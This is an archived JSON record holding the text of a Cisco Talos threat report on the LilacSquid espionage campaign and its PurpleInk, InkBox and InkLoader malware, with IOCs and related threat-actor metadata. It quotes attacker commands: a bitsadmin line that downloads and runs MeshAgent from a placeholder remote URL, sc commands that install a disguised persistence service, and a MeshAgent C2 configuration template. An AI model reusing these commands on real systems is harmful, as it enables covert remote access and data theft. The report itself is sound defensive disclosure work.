{ "id": "84cef086-df8d-4165-9781-d10ec6b5b137", "created_at": "2026-04-06T00:12:44.36737Z", "updated_at": "2026-04-10T03:34:54.397603Z", "deleted_at": null, "sha1_hash": "3e44daec53d7f7320626b5e9890bd17f84618fe3", "title": "LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 432259, "plain_text": "LilacSquid: The stealthy trilogy of PurpleInk, InkBox and\r\nInkLoader\r\nBy Asheer Malhotra\r\nPublished: 2024-05-30 · Archived: 2026-04-05 17:11:53 UTC\r\nThursday, May 30, 2024 08:01\r\nBy Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White. \r\nCisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an\r\nadvanced persistent threat actor (APT) we’re calling “LilacSquid.”  \r\nLilacSquid’s victimology includes a diverse set of victims consisting of information technology\r\norganizations building software for the research and industrial sectors in the United States, organizations in\r\nthe energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may\r\nbe agnostic of industry verticals and trying to steal data from a variety of sources.  \r\nThis campaign uses MeshAgent, an open-source remote management tool, and a customized version of\r\nQuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising\r\nvulnerable application servers exposed to the internet.  \r\nThis campaign leverages vulnerabilities in public-facing application servers and compromised remote\r\ndesktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as\r\nMeshAgent and SSF, alongside customized malware, such as \"PurpleInk,\" and two malware loaders we are\r\ncalling \"InkBox\" and \"InkLoader.”  \r\nThe campaign is geared toward establishing long-term access to compromised victim organizations to\r\nenable LilacSquid to siphon data of interest to attacker-controlled servers. \r\nLilacSquid – An espionage-motivated threat actor \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 1 of 9\n\nTalos assesses with high confidence that this campaign has been active since at least 2021 and the successful\r\ncompromise and post-compromise activities are geared toward establishing long-term access for data theft by an\r\nadvanced persistent threat (APT) actor we are tracking as \"LilacSquid\" and UAT-4820. Talos has observed at least\r\nthree successful compromises spanning entities in Asia, Europe and the United States consisting of industry\r\nverticals such as pharmaceuticals, oil and gas, and technology. \r\nPrevious intrusions into software manufacturers, such as the 3CX and X_Trader compromises by Lazarus, indicate\r\nthat unauthorized long-term access to organizations that manufacture and distribute popular software for\r\nenterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to\r\nthreat actors such as LilacSquid, allowing them to widen their net of targets.  \r\nWe have observed two different types of initial access techniques deployed by LilacSquid, including exploiting\r\nvulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity\r\nin this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop\r\nsession application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing\r\nLilacSquid to gain complete control over the infected systems. Additional means of persistence used by\r\nLilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for\r\nproxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. \r\nIt is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear\r\nsome overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public\r\nreporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after\r\nsuccessful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling\r\ntools, along with custom-made malware as part of their post-compromise playbooks to act as channels of\r\nsecondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where\r\nthe threat actor deployed SSF along with other malware to create tunnels to their remote servers. \r\nLilacSquid’s infection chains \r\nThere are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the\r\nsuccessful exploitation of a vulnerable web application, while the other is the use of compromised RDP\r\ncredentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto\r\ncompromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and\r\nPurpleInk. \r\nSuccessful exploitation of the vulnerable application results in the attackers deploying a script that will set up\r\nworking directories for the malware and then download and execute MeshAgent from a remote server. On\r\nexecution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and\r\nactivating other implants on the system, such as SSF and PurpleInk. \r\nMeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish\r\ncontact with the C2: \r\nbitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-  -\r\nlocal_path_for_MeshAgent- connect \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 2 of 9\n\nInstrumenting InkLoader – Modularizing the infection chain \r\nWhen compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid\r\nchose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection\r\npreceding PurpleInk.  \r\nInkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable\r\nor command. In this infection chain, InkLoader is the component that persists across reboots on the infected host\r\ninstead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but\r\nLilacSquid may likely use InkLoader to deploy additional malware implants. \r\nTalos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully\r\ncreate and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the\r\ntarget host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts\r\ninto desired directories on disk and the subsequent registration of InkLoader as a service that is then started to\r\ndeploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 3 of 9\n\nService creation and execution on the endpoint is typically done via the command line interface using the\r\ncommands: \r\nsc create TransactExDetect displayname=Extended Transaction Detection binPath= _filepath_of_InkLoade\r\nsc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts\r\nsc start TransactExDetect\r\nPurpleInk – LilacSquid's bespoke implant \r\nPurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access\r\ntrojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk\r\nbeing actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent\r\nmalware family.  \r\nPurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port.\r\nThis file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. \r\nPurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos\r\nhas observed multiple variants of PurpleInk where functionalities have both been introduced and removed. \r\nIn terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: \r\nEnumerate the process and send the process ID, name and associated Window Title to the C2. \r\nTerminate a process ID (PID) specified by the C2 on the infected host. \r\nRun a new application on the host – start process. \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 4 of 9\n\nGet drive information for the infected host, such as volume labels, root directory names, drive type and\r\ndrive format. \r\nEnumerate a given directory to obtain underlying directory names, file names and file sizes. \r\nRead a file specified by the C2 and exfiltrate its contents. \r\nReplace or append content to a specified file. \r\nGather system information about the infected host using WMI queries. Information includes:  \r\nInformation\r\nretrieved \r\nWMI query and output used \r\nProcessor name  SELECT * FROM Win32_Processor \r\nMemory (RAM) size\r\nin MB \r\nSelect * From Win32_ComputerSystem | TotalPhysicalMemory \r\nVideo Card (GPU)  SELECT * FROM Win32_DisplayConfiguration | Description \r\nUsername  Current username \r\nComputer name  Infected host’s name \r\nDomain name  Domain of the infected host \r\nHost name  NetBIOS Host name \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 5 of 9\n\nSystem drive  Root system drive \r\nSystem directory  System directory of the infected host \r\nComputer uptime \r\nCalculate uptime from current time and SELECT * FROM Win32_OperatingSystem\r\nWHERE Primary='true' | LastBootUpTime \r\nMAC address  By enumerating Network interfaces on the endpoint \r\nLAN IP address  By enumerating Network interfaces on the endpoint \r\nWAN IP address  None – not retrieved or calculated – empty string sent to C2. \r\nAntivirus software\r\nname \r\nNot calculated – defaults to “NoInfo” \r\nFirewall  Not calculated – defaults to “NoInfo” \r\nTime zone  Not calculated – an empty string is sent to the C2. \r\nCountry  Not calculated – an empty string is sent to the C2. \r\nISP  Not calculated – an empty string is sent to the C2. \r\nStart a remote shell on the infected host using ‘ cmd[.]exe /K ’. \r\nRename or move directories and files and then enumerate them. \r\nDelete files and directories specified by the C2. \r\nConnect to a specified remote address, specified by the C2. This remote address referenced as “Friend”\r\ninternally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool. \r\nPurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): \r\nConnect to a new friend whose remote address is specified by the C2. \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 6 of 9\n\nSend data to a new or existing friend. \r\nDisconnect from a specified friend. \r\nReceive data from another connected friend and process it. \r\nAnother PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of\r\nits capabilities stripped out. The capabilities that still reside in this variant are the abilities to: \r\nClose all connections to proxy servers. \r\nCreate a reverse shell.  \r\nConnect and send/receive data from connected proxies. \r\nFunctionalities, such as file management, execution and gathering system information, have been stripped out of\r\nthis variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which\r\ncan be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together\r\nfunctionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their\r\nimplementations to remove redundant capabilities.  \r\nInkBox – Custom loader observed in older attacks \r\nInkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The\r\ndecrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox\r\nprocess. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: \r\nThe usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the\r\nthreat actor has produced another variant of the infection chain where they have modularized the infection chain\r\nso that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still\r\nrun via another component that we call \"InkLoader.”  \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 7 of 9\n\nLilacSquid employs MeshAgent \r\nIn this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity.\r\nMeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The\r\nMeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign\r\ncontain information such as MeshName (victim identifier in this case) and C2 addresses: \r\nMeshName=-Name_of_mesh-\r\nMeshType=-Type_of_mesh-\r\nMeshID=0x-Mesh_ID_hex-\r\nServerID=-Server_ID_hex-\r\nMeshServer=wss://-Mesh_C2_Address-Translation=-keywords_translation_JSON-Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the\r\ndevice via the MeshCentral server, providing capabilities such as: \r\nList all devices in the Mesh (list of victims). \r\nView and control desktop. \r\nManage files on the system. \r\nView software and hardware information about the device.  \r\nPost-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF\r\nand PurpleInk.  \r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.   \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.  \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.  \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 8 of 9\n\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.  \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.  \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protection with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.  \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.  \r\nThe following Snort SIDs have been released to detect this threat: 63511 - 63514, 300920 - 300921.\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here. \r\nPurpleInk \r\n2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 \r\nNetwork IOCs \r\n67[.]213[.]221[.]6 \r\n192[.]145[.]127[.]190 \r\n45[.]9[.]251[.]14 \r\n199[.]229[.]250[.]142 \r\nSource: https://blog.talosintelligence.com/lilacsquid/\r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/lilacsquid/" ], "report_names": [ "lilacsquid" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "113699a2-d359-43cd-a923-ac7525bae6a8", "created_at": "2024-06-07T02:00:04.010352Z", "updated_at": "2026-04-10T02:00:03.648005Z", "deleted_at": null, "main_name": "LilacSquid", "aliases": [], "source_name": "MISPGALAXY:LilacSquid", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434364, "ts_updated_at": 1775792094, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.pdf", "text": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.txt", "img": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.jpg" } }